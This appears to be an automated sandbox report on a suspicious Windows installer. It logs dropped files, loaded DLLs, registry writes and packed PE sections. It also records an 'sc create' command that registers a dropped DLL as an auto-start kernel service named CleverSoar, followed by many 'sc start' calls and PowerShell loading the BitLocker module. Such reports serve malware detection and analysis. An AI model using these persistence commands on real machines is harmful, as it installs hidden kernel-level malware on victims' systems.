Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe

Static file information: File size 5707631 > 1048576

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 10_2_00B757D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,

10_2_00B757D0

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe	Static PE information: real checksum: 0x0 should be: 0x57286f
Source: update.vac.6.dr	Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: update.vac.2.dr	Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr	Static PE information: real checksum: 0x0 should be: 0x343a15
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr	Static PE information: real checksum: 0x0 should be: 0x343a15
Source: hrsw.vbc.6.dr	Static PE information: real checksum: 0x0 should be: 0x379bd6
Source: tProtect.dll.12.dr	Static PE information: real checksum: 0x1eb0f should be: 0xfc66

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe	Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr	Static PE information: section name: .didata
Source: update.vac.2.dr	Static PE information: section name: .00cfg
Source: update.vac.2.dr	Static PE information: section name: .voltbl
Source: update.vac.2.dr	Static PE information: section name: .=~
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr	Static PE information: section name: .didata
Source: 7zr.exe.6.dr	Static PE information: section name: .sxdata
Source: is-0F5J3.tmp.6.dr	Static PE information: section name: .xdata
Source: hrsw.vbc.6.dr	Static PE information: section name: .00cfg
Source: hrsw.vbc.6.dr	Static PE information: section name: .voltbl
Source: hrsw.vbc.6.dr	Static PE information: section name: .=~
Source: update.vac.6.dr	Static PE information: section name: .00cfg
Source: update.vac.6.dr	Static PE information: section name: .voltbl
Source: update.vac.6.dr	Static PE information: section name: .=~

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA286EB push ecx; ret	6_2_6CA286FE
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6C8D0F00 push ss; retn 0001h	6_2_6C8D0F0A
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAF6F10 push eax; ret	6_2_6CAF6F2E
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CA5B9F4 push 004AC35Ch; ret	6_2_6CA5BA0E
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Code function: 6_2_6CAF7290 push eax; ret	6_2_6CAF72BE
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00AF45F4 push 00B9C35Ch; ret	10_2_00AF460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B8FB10 push eax; ret	10_2_00B8FB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_00B8FE90 push eax; ret	10_2_00B8FEBE

Source: update.vac.2.dr	Static PE information: section name: .=~ entropy: 7.19316283520878
Source: hrsw.vbc.6.dr	Static PE information: section name: .=~ entropy: 7.19316283520878
Source: update.vac.6.dr	Static PE information: section name: .=~ entropy: 7.19316283520878

Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	File created: C:\Users\user\AppData\Local\Temp\is-R46SO.tmp\update.vac	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	File created: C:\Program Files (x86)\Windows NT\hrsw.vbc	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	File created: C:\Program Files (x86)\Windows NT\trash (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	File created: C:\Users\user\AppData\Local\Temp\is-V2E3L.tmp\update.vac	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	File created: C:\Users\user\AppData\Local\Temp\is-R46SO.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe	File created: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.6.exe	File created: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	Jump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exe	File created: C:\Program Files (x86)\Windows NT\tProtect.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	File created: C:\Program Files (x86)\Windows NT\is-0F5J3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	File created: C:\Users\user\AppData\Local\Temp\is-V2E3L.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	File created: C:\Program Files (x86)\Windows NT\7zr.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-U5HAP.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	File created: C:\Users\user\AppData\Local\Temp\is-R46SO.tmp\update.vac	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	File created: C:\Program Files (x86)\Windows NT\hrsw.vbc	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp	File created: C:\Users\user\AppData\Local\Temp\is-V2E3L.tmp\update.vac	Jump to dropped file

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

